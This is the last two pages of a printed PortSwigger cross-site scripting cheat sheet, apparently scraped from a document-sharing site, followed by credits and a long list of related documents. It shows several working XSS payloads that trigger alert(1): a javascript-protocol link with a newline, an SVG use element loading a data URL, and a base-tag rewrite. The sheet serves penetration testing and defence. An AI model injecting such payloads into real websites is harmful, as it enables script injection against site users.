<a href="%0aalert(1)" onclick="protocol='javascript'">test</a>

Copy

Link

Data URL with use element and base64 encoded

Copy

Link

Data URL with use element

<svg><use href="data:image/svg+xml,<svg id='x' xmlns='http://www.w3.org/2000/svg'><image href='1'

onerror='alert(1)' /></svg>#x" />

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet 74/75
5/24/25, 5:42 PM Cross-Site Scripting (XSS) Cheat Sheet - 2025 Edition | Web Security Academy

Copy

Link

JavaScript protocol with new line

Copy

Link

Base tag with JavaScript protocol rewriting relative URLS

<base href="javascript:/a/-alert(1)///////"><a href=../lol/safari.html>test</a>

Copy

Link

Credits
Brought to you by PortSwigger Research. Created by @garethheyes.
This cheat sheet wouldn't be possible without the web security community who share their research. Big thanks to: James Kettle, Mario Heiderich, Eduar
Masato Kinugawa, Filedescriptor, LeverOne, Ben Hayak, Alex Inführ, Mathias Karlsson, Jann Horn, Ian Hickey, Gábor Molnár, tsetnep, Psych0tr1a, Skyp
Abdulrhman Alqabandi, brainpillow, Kyo, Yosuke Hasegawa, White Jordan, Algol, jackmasa, wpulog, Bolk, Robert Hansen, David Lindsay, Superhei, Mich
Zalewski, Renaud Lifchitz, Roman Ivanov, Frederik Braun, Krzysztof Kotowicz, Giorgio Maone, GreyMagic, Marcus Niemietz, Soroush Dalili, Stefano Di P
Roman Shafigullin, Lewis Ardern, Michał Bentkowski, SØᴘᴀS, avanish46, Juuso Käenmäki, jinmo123, itszn13, Martin Bajanik, David Granqvist, Andrea
(theMiddle) Menin, simps0n, hahwul, Paweł Hałdrzyński, Jun Kokatsu, RenwaX23, sratarun, har1sec, Yann C., gadhiyasavan, p4fg, diofeher, Sergey Bob
PwnFunction, Guilherme Keerok, Alex Brasetvik, s1r1us, ngyikp, the-xentropy, Rando111111, Fzs, Sivakumar, Dwi Siswanto, bxmbn, Tarunkant Gupta, la
Begeek, Hannes Leopold, yawnmoth, Yair Amit, Franz Sedlmaier, Łukasz Pilorz, Steven Christey, Dan Crowley, Rene Ledosquet, Kurt Huwig, Moritz Nau
Jonathan Vanasco, nEUrOO, Sec Consult, Timo, Ozh, David Ross, Lukasz Plonka (sp3x), xhzeem, Mach1ne, AmirMohammad Safari, Tom Schuster, Wc
Filipnyquist, zhenwarx, smhtahsin33, Andrei Nicolaiciuc, Hiv01tag3, Andrej Šimko, parrot409, terjanq, _0x999, isacaya_, williamserizao
You can contribute to this cheat sheet by creating a new issue or updating the JSON and creating a pull request

Burp Suite Vulnerabilities Customers Company Insights

Web vulnerability scanner Cross-site scripting (XSS) Organizations About Web Security Academy
Burp Suite Editions SQL injection Testers Careers Blog
Release Notes Cross-site request forgery Developers Contact Research  Follow us
XML external entity injection Legal
Directory traversal Privacy Notice © 2025 PortSwigger Ltd
Server-side request forgery

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet 75/75

Cheat Sheet
No ratings yet
Cheat Sheet
63 pages
Cross-Site Scripting (XSS) Cheat Sheet: Event Handlers That Do Not Require User Interaction
No ratings yet
Cross-Site Scripting (XSS) Cheat Sheet: Event Handlers That Do Not Require User Interaction
29 pages
XSS Cheat Sheet for Web Developers
No ratings yet
XSS Cheat Sheet for Web Developers
90 pages
Cross-Site Scripting (XSS) Cheat Sheet: Event Handlers That Do Not Require User Interaction
No ratings yet
Cross-Site Scripting (XSS) Cheat Sheet: Event Handlers That Do Not Require User Interaction
20 pages
XSS Vectors for Security Experts
No ratings yet
XSS Vectors for Security Experts
21 pages
XSS Vectors for Security Experts
No ratings yet
XSS Vectors for Security Experts
26 pages
Xss Cheat Sheet
No ratings yet
Xss Cheat Sheet
29 pages
XSS Cheat Sheet: Types & Event Handlers
No ratings yet
XSS Cheat Sheet: Types & Event Handlers
45 pages
"
100% (1)
"
19 pages
XSS Cheat Sheet for Developers
No ratings yet
XSS Cheat Sheet for Developers
24 pages
Cross Site Scripting
No ratings yet
Cross Site Scripting
8 pages
Cross-Site Scripting (XSS)
No ratings yet
Cross-Site Scripting (XSS)
8 pages
Understanding DOM-Based XSS Vulnerabilities
No ratings yet
Understanding DOM-Based XSS Vulnerabilities
42 pages
Hyperscript Event & Command Guide
No ratings yet
Hyperscript Event & Command Guide
2 pages
XSS Vulnerability Examples
No ratings yet
XSS Vulnerability Examples
21 pages
CSS Animations & Transitions - Complete Tutorial
No ratings yet
CSS Animations & Transitions - Complete Tutorial
10 pages
Unraveling Some of The Mysteries Around DOM-based XSS
100% (1)
Unraveling Some of The Mysteries Around DOM-based XSS
36 pages
Summary of Css Grid
No ratings yet
Summary of Css Grid
24 pages
CSS Animation Techniques Explained
No ratings yet
CSS Animation Techniques Explained
5 pages
Lecture 19 IS BSE 7A SMI Fall 2024
No ratings yet
Lecture 19 IS BSE 7A SMI Fall 2024
35 pages
Multimedia Animation Answers
No ratings yet
Multimedia Animation Answers
25 pages
Bug Bounty Course
No ratings yet
Bug Bounty Course
28 pages
XSS (Cross Site Scripting) Cheat Sheet Esp: For Filter Evasion
No ratings yet
XSS (Cross Site Scripting) Cheat Sheet Esp: For Filter Evasion
18 pages
Ultimate+XSS+Guide+ +slides
No ratings yet
Ultimate+XSS+Guide+ +slides
43 pages
XSS Survival Guide for Beginners
No ratings yet
XSS Survival Guide for Beginners
43 pages
Preventing Cross-Site Scripting (XSS)
No ratings yet
Preventing Cross-Site Scripting (XSS)
20 pages
104 XSS Filter Evasion and WAF Bypassing
67% (3)
104 XSS Filter Evasion and WAF Bypassing
86 pages
XSS (Cross Site Scripting) Cheat Sheet
No ratings yet
XSS (Cross Site Scripting) Cheat Sheet
19 pages
The Ultimate XSS Protection Cheatsheet For Developers
No ratings yet
The Ultimate XSS Protection Cheatsheet For Developers
24 pages
10 Events
No ratings yet
10 Events
13 pages
XSS Attack and How To Mitigate It
No ratings yet
XSS Attack and How To Mitigate It
8 pages
One Columns Css File
No ratings yet
One Columns Css File
29 pages
XSS Attack Techniques and Payloads Guide
No ratings yet
XSS Attack Techniques and Payloads Guide
11 pages
Css Transition
No ratings yet
Css Transition
7 pages
JavaScript and XHTML Documents
100% (3)
JavaScript and XHTML Documents
40 pages
XSS Filter Evasion Techniques Guide
No ratings yet
XSS Filter Evasion Techniques Guide
7 pages
WT Question Bank 20 Marks
No ratings yet
WT Question Bank 20 Marks
18 pages
Javascript: DOM, Manipulation, and Events
No ratings yet
Javascript: DOM, Manipulation, and Events
32 pages
Browser Security, Part 1
No ratings yet
Browser Security, Part 1
25 pages
Beginner's Guide to XSS Security
No ratings yet
Beginner's Guide to XSS Security
8 pages
OWASP XSS Filter Evasion Guide
No ratings yet
OWASP XSS Filter Evasion Guide
35 pages
jQuery Fundamentals and Selectors Guide
No ratings yet
jQuery Fundamentals and Selectors Guide
13 pages
CSS Animation and Transition Quiz
No ratings yet
CSS Animation and Transition Quiz
11 pages
What Is Cross-Site Scripting (XSS) and How To Prevent It - Web
No ratings yet
What Is Cross-Site Scripting (XSS) and How To Prevent It - Web
6 pages
Understanding CSS Animation Techniques
No ratings yet
Understanding CSS Animation Techniques
26 pages
Serie 11
No ratings yet
Serie 11
3 pages
DOM XSS Guide for Web Developers
No ratings yet
DOM XSS Guide for Web Developers
3 pages
PCC - Exp 3
No ratings yet
PCC - Exp 3
4 pages
Reflected XSS - Manual Attacks
No ratings yet
Reflected XSS - Manual Attacks
5 pages
238 Mini-API / Cheat Sheet You May Detach These Sheets Selecting
No ratings yet
238 Mini-API / Cheat Sheet You May Detach These Sheets Selecting
4 pages
Cross-Site Scripting: Analysis, Identification and Exploitation
No ratings yet
Cross-Site Scripting: Analysis, Identification and Exploitation
28 pages
CSS2
No ratings yet
CSS2
7 pages
XSS Filter Evasion Techniques Guide
No ratings yet
XSS Filter Evasion Techniques Guide
43 pages
Web Tech Unit3
No ratings yet
Web Tech Unit3
30 pages
Website Design Trust and Culture An Eigh
No ratings yet
Website Design Trust and Culture An Eigh
5 pages
Smart Grid Challenges in Africa
No ratings yet
Smart Grid Challenges in Africa
25 pages
BÀI MẪU TẠP CHÍ UFM
No ratings yet
BÀI MẪU TẠP CHÍ UFM
14 pages
Payment Processing with pacs.009 Cov
No ratings yet
Payment Processing with pacs.009 Cov
1 page
Computer Security, Ethics and Privacy PDF
100% (2)
Computer Security, Ethics and Privacy PDF
55 pages
Thesis Writing Help for Students
100% (3)
Thesis Writing Help for Students
4 pages
Moon Exports India
No ratings yet
Moon Exports India
8 pages
LUCKY Sample Work FILE
No ratings yet
LUCKY Sample Work FILE
73 pages
PR5 Well Lighting Calculation
No ratings yet
PR5 Well Lighting Calculation
1 page
Maternity and Pediatric Nursing Third Edition Study Guide
No ratings yet
Maternity and Pediatric Nursing Third Edition Study Guide
310 pages
Lab No. 01 Title: Project Assignment, Proposal Preparation and Planning
No ratings yet
Lab No. 01 Title: Project Assignment, Proposal Preparation and Planning
6 pages
Final Draft Class 12 2023 (1751)
No ratings yet
Final Draft Class 12 2023 (1751)
5 pages
FCSC Code of Regulations, October 2024
No ratings yet
FCSC Code of Regulations, October 2024
6 pages
Form Work
No ratings yet
Form Work
37 pages
El30xx en
No ratings yet
El30xx en
478 pages
MNTB Training Record
67% (3)
MNTB Training Record
2 pages
Concept Paper School Sports Program
100% (1)
Concept Paper School Sports Program
3 pages
Cex CRH
100% (3)
Cex CRH
424 pages
Case Study Hershey Food Corporation
No ratings yet
Case Study Hershey Food Corporation
9 pages
Courses Actuarial Science Unilus
No ratings yet
Courses Actuarial Science Unilus
2 pages
Advisian Business Process - MAIN
No ratings yet
Advisian Business Process - MAIN
10 pages
General Intro To The Aromaticity, Grade 12
No ratings yet
General Intro To The Aromaticity, Grade 12
40 pages
Bhel Haridwar
No ratings yet
Bhel Haridwar
51 pages
Conceptual Framework for Financial Reporting
No ratings yet
Conceptual Framework for Financial Reporting
20 pages
FOOD SYSTEMS RESILIENCE PROJECT Report
No ratings yet
FOOD SYSTEMS RESILIENCE PROJECT Report
4 pages
CH 2 Student's
No ratings yet
CH 2 Student's
26 pages
Variance Analysis of Kohinur Chemical 01
50% (2)
Variance Analysis of Kohinur Chemical 01
7 pages
Testing Charges for TWAD Lab Samples
No ratings yet
Testing Charges for TWAD Lab Samples
10 pages
Samsung Repair Guide
No ratings yet
Samsung Repair Guide
9 pages
Operational Intelligence in Telecom
No ratings yet
Operational Intelligence in Telecom
58 pages